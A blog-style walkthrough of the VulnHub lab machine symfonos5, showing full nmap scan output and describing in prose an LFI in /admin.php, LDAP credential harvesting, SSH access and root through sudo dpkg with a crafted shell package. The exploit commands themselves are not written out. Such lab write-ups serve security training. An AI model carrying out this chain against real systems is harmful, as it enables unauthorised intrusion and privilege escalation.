Description:
This is an easy and real-life machine from VulnHub designed to teach people the importance of understanding from the interior.
It has a LFI that can make attackers read files and that leads us to get credentials of a user that can run dpkg as a root!
let’s find how we can get root on this machine.
You can download the machine from here!
[1] Information gathering:
We start by scanning all open ports and identify services running on them by using nmap tool with its different options.
# Nmap 7.80 scan initiated Tue Feb 25 17:57:47 2020 as: nmap -sV -sC -A -p- -oA nmap symfonos5.vh
Nmap scan report for symfonos5.vh (192.168.43.173)
Host is up (0.00036s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 16:70:13:77:22:f9:68:78:40:0d:21:76:c1:50:54:23 (RSA)
| 256 a8:06:23:d0:93:18:7d:7a:6b:05:77:8d:8b:c9:ec:02 (ECDSA)
|_ 256 52:c0:83:18:f4:c7:38:65:5a:ce:97:66:f3:75:68:4c (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
636/tcp open ldapssl?
MAC Address: 08:00:27:1E:87:84 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.36 ms symfonos5.vh (192.168.43.173)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Feb 25 17:59:02 2020 -- 1 IP address (1 host up) scanned in 75.44 seconds
I visited http://symfonos5.vh/ and all i found is
So i used gobuster tool to brute-force files and directories.
And i found an interesting login page called /admin.php
[2] Scanning:
I scanned this login page against all types of injection but it didn’t work.
I opened burp to intercept the requests and read the responses and i found an interesting thing as follow
Yup! it seems like a parameter takes a file location, and it can lead to LFI so, i tested this by trying to read /etc/passwd file as follow
[3] Exploitation:
I used this bug to read the /admin.php and it contained the credentials of ldap
We have the ldap port open in this machine and for enumerating it we need valid credentials and already we have! so, i searched for an nmap script to enumerate ldap and i found that
I opened the ldap-search.nse and its usage is as follow
I used it and it return the password and some information related to the user zeus
I sshed with these credentials and it works successfully, and now we have the user permissions.
[4] Privilege escalation:
Zeus can run dpkg as root, and that means zeus can install any packages!
After some searches i found that
But i don’t have fpm installed on my machine! so, i installed it on another machine, and i created a package called x contain shell and copied it to transfer it to symfonos-5 machine
On symfonos5 machine i downloaded that package by wget as follow
And i run the command as the root by sudo command and it gave me a shell with root permissions and the proof was as follow
Finally, Thank you and i hope you learned something new!
For any question, you can find me on:
Leave a comment